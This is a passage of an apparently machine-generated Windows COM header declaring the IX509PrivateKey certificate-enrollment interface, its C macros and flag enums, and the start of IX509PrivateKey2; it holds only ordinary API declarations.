        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509PrivateKey * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Open )( 
            __RPC__in IX509PrivateKey * This);
        
        HRESULT ( STDMETHODCALLTYPE *Create )( 
            __RPC__in IX509PrivateKey * This);
        
        HRESULT ( STDMETHODCALLTYPE *Close )( 
            __RPC__in IX509PrivateKey * This);
        
        HRESULT ( STDMETHODCALLTYPE *Delete )( 
            __RPC__in IX509PrivateKey * This);
        
        HRESULT ( STDMETHODCALLTYPE *Verify )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ X509PrivateKeyVerify VerifyType);
        
        HRESULT ( STDMETHODCALLTYPE *Import )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in BSTR strExportType,
            /* [in] */ __RPC__in BSTR strEncodedKey,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        HRESULT ( STDMETHODCALLTYPE *Export )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in BSTR strExportType,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrEncodedKey);
        
        HRESULT ( STDMETHODCALLTYPE *ExportPublicKey )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PublicKey **ppPublicKey);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ContainerName )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ContainerName )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ContainerNamePrefix )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ContainerNamePrefix )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ReaderName )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ReaderName )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformations )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspInformations )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in_opt ICspInformations *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspStatus )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspStatus )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in_opt ICspStatus *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ProviderName )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ProviderName )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ProviderType )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out X509ProviderType *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ProviderType )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ X509ProviderType Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_LegacyCsp )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_LegacyCsp )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Algorithm )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Algorithm )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeySpec )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out X509KeySpec *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeySpec )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ X509KeySpec Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Length )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Length )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ LONG Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ExportPolicy )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out X509PrivateKeyExportFlags *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ExportPolicy )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ X509PrivateKeyExportFlags Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeyUsage )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out X509PrivateKeyUsageFlags *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeyUsage )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ X509PrivateKeyUsageFlags Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeyProtection )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out X509PrivateKeyProtection *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeyProtection )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ X509PrivateKeyProtection Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_MachineContext )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_MachineContext )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SecurityDescriptor )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SecurityDescriptor )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Certificate )( 
            __RPC__in IX509PrivateKey * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Certificate )( 
            __RPC__in IX509PrivateKey * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UniqueContainerName )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Opened )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_DefaultContainer )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Existing )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Existing )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Pin )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_FriendlyName )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_FriendlyName )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Description )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Description )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in BSTR Value);
        
        END_INTERFACE
    } IX509PrivateKeyVtbl;

    interface IX509PrivateKey
    {
        CONST_VTBL struct IX509PrivateKeyVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509PrivateKey_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509PrivateKey_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509PrivateKey_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509PrivateKey_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509PrivateKey_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509PrivateKey_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509PrivateKey_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509PrivateKey_Open(This)	\
    ( (This)->lpVtbl -> Open(This) ) 

#define IX509PrivateKey_Create(This)	\
    ( (This)->lpVtbl -> Create(This) ) 

#define IX509PrivateKey_Close(This)	\
    ( (This)->lpVtbl -> Close(This) ) 

#define IX509PrivateKey_Delete(This)	\
    ( (This)->lpVtbl -> Delete(This) ) 

#define IX509PrivateKey_Verify(This,VerifyType)	\
    ( (This)->lpVtbl -> Verify(This,VerifyType) ) 

#define IX509PrivateKey_Import(This,strExportType,strEncodedKey,Encoding)	\
    ( (This)->lpVtbl -> Import(This,strExportType,strEncodedKey,Encoding) ) 

#define IX509PrivateKey_Export(This,strExportType,Encoding,pstrEncodedKey)	\
    ( (This)->lpVtbl -> Export(This,strExportType,Encoding,pstrEncodedKey) ) 

#define IX509PrivateKey_ExportPublicKey(This,ppPublicKey)	\
    ( (This)->lpVtbl -> ExportPublicKey(This,ppPublicKey) ) 

#define IX509PrivateKey_get_ContainerName(This,pValue)	\
    ( (This)->lpVtbl -> get_ContainerName(This,pValue) ) 

#define IX509PrivateKey_put_ContainerName(This,Value)	\
    ( (This)->lpVtbl -> put_ContainerName(This,Value) ) 

#define IX509PrivateKey_get_ContainerNamePrefix(This,pValue)	\
    ( (This)->lpVtbl -> get_ContainerNamePrefix(This,pValue) ) 

#define IX509PrivateKey_put_ContainerNamePrefix(This,Value)	\
    ( (This)->lpVtbl -> put_ContainerNamePrefix(This,Value) ) 

#define IX509PrivateKey_get_ReaderName(This,pValue)	\
    ( (This)->lpVtbl -> get_ReaderName(This,pValue) ) 

#define IX509PrivateKey_put_ReaderName(This,Value)	\
    ( (This)->lpVtbl -> put_ReaderName(This,Value) ) 

#define IX509PrivateKey_get_CspInformations(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformations(This,ppValue) ) 

#define IX509PrivateKey_put_CspInformations(This,pValue)	\
    ( (This)->lpVtbl -> put_CspInformations(This,pValue) ) 

#define IX509PrivateKey_get_CspStatus(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspStatus(This,ppValue) ) 

#define IX509PrivateKey_put_CspStatus(This,pValue)	\
    ( (This)->lpVtbl -> put_CspStatus(This,pValue) ) 

#define IX509PrivateKey_get_ProviderName(This,pValue)	\
    ( (This)->lpVtbl -> get_ProviderName(This,pValue) ) 

#define IX509PrivateKey_put_ProviderName(This,Value)	\
    ( (This)->lpVtbl -> put_ProviderName(This,Value) ) 

#define IX509PrivateKey_get_ProviderType(This,pValue)	\
    ( (This)->lpVtbl -> get_ProviderType(This,pValue) ) 

#define IX509PrivateKey_put_ProviderType(This,Value)	\
    ( (This)->lpVtbl -> put_ProviderType(This,Value) ) 

#define IX509PrivateKey_get_LegacyCsp(This,pValue)	\
    ( (This)->lpVtbl -> get_LegacyCsp(This,pValue) ) 

#define IX509PrivateKey_put_LegacyCsp(This,Value)	\
    ( (This)->lpVtbl -> put_LegacyCsp(This,Value) ) 

#define IX509PrivateKey_get_Algorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_Algorithm(This,ppValue) ) 

#define IX509PrivateKey_put_Algorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_Algorithm(This,pValue) ) 

#define IX509PrivateKey_get_KeySpec(This,pValue)	\
    ( (This)->lpVtbl -> get_KeySpec(This,pValue) ) 

#define IX509PrivateKey_put_KeySpec(This,Value)	\
    ( (This)->lpVtbl -> put_KeySpec(This,Value) ) 

#define IX509PrivateKey_get_Length(This,pValue)	\
    ( (This)->lpVtbl -> get_Length(This,pValue) ) 

#define IX509PrivateKey_put_Length(This,Value)	\
    ( (This)->lpVtbl -> put_Length(This,Value) ) 

#define IX509PrivateKey_get_ExportPolicy(This,pValue)	\
    ( (This)->lpVtbl -> get_ExportPolicy(This,pValue) ) 

#define IX509PrivateKey_put_ExportPolicy(This,Value)	\
    ( (This)->lpVtbl -> put_ExportPolicy(This,Value) ) 

#define IX509PrivateKey_get_KeyUsage(This,pValue)	\
    ( (This)->lpVtbl -> get_KeyUsage(This,pValue) ) 

#define IX509PrivateKey_put_KeyUsage(This,Value)	\
    ( (This)->lpVtbl -> put_KeyUsage(This,Value) ) 

#define IX509PrivateKey_get_KeyProtection(This,pValue)	\
    ( (This)->lpVtbl -> get_KeyProtection(This,pValue) ) 

#define IX509PrivateKey_put_KeyProtection(This,Value)	\
    ( (This)->lpVtbl -> put_KeyProtection(This,Value) ) 

#define IX509PrivateKey_get_MachineContext(This,pValue)	\
    ( (This)->lpVtbl -> get_MachineContext(This,pValue) ) 

#define IX509PrivateKey_put_MachineContext(This,Value)	\
    ( (This)->lpVtbl -> put_MachineContext(This,Value) ) 

#define IX509PrivateKey_get_SecurityDescriptor(This,pValue)	\
    ( (This)->lpVtbl -> get_SecurityDescriptor(This,pValue) ) 

#define IX509PrivateKey_put_SecurityDescriptor(This,Value)	\
    ( (This)->lpVtbl -> put_SecurityDescriptor(This,Value) ) 

#define IX509PrivateKey_get_Certificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Certificate(This,Encoding,pValue) ) 

#define IX509PrivateKey_put_Certificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_Certificate(This,Encoding,Value) ) 

#define IX509PrivateKey_get_UniqueContainerName(This,pValue)	\
    ( (This)->lpVtbl -> get_UniqueContainerName(This,pValue) ) 

#define IX509PrivateKey_get_Opened(This,pValue)	\
    ( (This)->lpVtbl -> get_Opened(This,pValue) ) 

#define IX509PrivateKey_get_DefaultContainer(This,pValue)	\
    ( (This)->lpVtbl -> get_DefaultContainer(This,pValue) ) 

#define IX509PrivateKey_get_Existing(This,pValue)	\
    ( (This)->lpVtbl -> get_Existing(This,pValue) ) 

#define IX509PrivateKey_put_Existing(This,Value)	\
    ( (This)->lpVtbl -> put_Existing(This,Value) ) 

#define IX509PrivateKey_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509PrivateKey_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509PrivateKey_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509PrivateKey_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509PrivateKey_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define IX509PrivateKey_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define IX509PrivateKey_put_Pin(This,Value)	\
    ( (This)->lpVtbl -> put_Pin(This,Value) ) 

#define IX509PrivateKey_get_FriendlyName(This,pValue)	\
    ( (This)->lpVtbl -> get_FriendlyName(This,pValue) ) 

#define IX509PrivateKey_put_FriendlyName(This,Value)	\
    ( (This)->lpVtbl -> put_FriendlyName(This,Value) ) 

#define IX509PrivateKey_get_Description(This,pValue)	\
    ( (This)->lpVtbl -> get_Description(This,pValue) ) 

#define IX509PrivateKey_put_Description(This,Value)	\
    ( (This)->lpVtbl -> put_Description(This,Value) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509PrivateKey_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0014 */
/* [local] */ 

typedef 
enum X509HardwareKeyUsageFlags
    {
        XCN_NCRYPT_PCP_NONE	= 0,
        XCN_NCRYPT_TPM12_PROVIDER	= 0x10000,
        XCN_NCRYPT_PCP_SIGNATURE_KEY	= 0x1,
        XCN_NCRYPT_PCP_ENCRYPTION_KEY	= 0x2,
        XCN_NCRYPT_PCP_GENERIC_KEY	= ( 0x1 | 0x2 ) ,
        XCN_NCRYPT_PCP_STORAGE_KEY	= 0x4,
        XCN_NCRYPT_PCP_IDENTITY_KEY	= 0x8
    } 	X509HardwareKeyUsageFlags;

typedef 
enum X509KeyParametersExportType
    {
        XCN_CRYPT_OID_USE_CURVE_NONE	= 0,
        XCN_CRYPT_OID_USE_CURVE_NAME_FOR_ENCODE_FLAG	= 0x20000000,
        XCN_CRYPT_OID_USE_CURVE_PARAMETERS_FOR_ENCODE_FLAG	= 0x10000000
    } 	X509KeyParametersExportType;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0014_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0014_v0_0_s_ifspec;

#ifndef __IX509PrivateKey2_INTERFACE_DEFINED__
#define __IX509PrivateKey2_INTERFACE_DEFINED__

/* interface IX509PrivateKey2 */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509PrivateKey2;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab362-217d-11da-b2a4-000e7bbb2b09")
    IX509PrivateKey2 : public IX509PrivateKey
    {
    public:
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_HardwareKeyUsage( 
            /* [retval][out] */ __RPC__out X509HardwareKeyUsageFlags *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_HardwareKeyUsage( 
            /* [in] */ X509HardwareKeyUsageFlags Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_AlternateStorageLocation( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_AlternateStorageLocation( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_AlgorithmName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_AlgorithmName( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_AlgorithmParameters( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_AlgorithmParameters( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ParametersExportType( 
            /* [retval][out] */ __RPC__out X509KeyParametersExportType *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_ParametersExportType( 
            /* [in] */ X509KeyParametersExportType Value) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509PrivateKey2Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509PrivateKey2 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509PrivateKey2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509PrivateKey2 * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Open )( 
            __RPC__in IX509PrivateKey2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *Create )( 
            __RPC__in IX509PrivateKey2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *Close )( 
            __RPC__in IX509PrivateKey2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *Delete )( 
            __RPC__in IX509PrivateKey2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *Verify )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ X509PrivateKeyVerify VerifyType);
        
        HRESULT ( STDMETHODCALLTYPE *Import )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ __RPC__in BSTR strExportType,
            /* [in] */ __RPC__in BSTR strEncodedKey,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        HRESULT ( STDMETHODCALLTYPE *Export )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ __RPC__in BSTR strExportType,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrEncodedKey);
        
        HRESULT ( STDMETHODCALLTYPE *ExportPublicKey )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PublicKey **ppPublicKey);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ContainerName )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ContainerName )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ContainerNamePrefix )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ContainerNamePrefix )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ReaderName )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ReaderName )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformations )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspInformations )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ __RPC__in_opt ICspInformations *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspStatus )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspStatus )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ __RPC__in_opt ICspStatus *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ProviderName )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ProviderName )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ProviderType )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__out X509ProviderType *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ProviderType )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ X509ProviderType Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_LegacyCsp )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
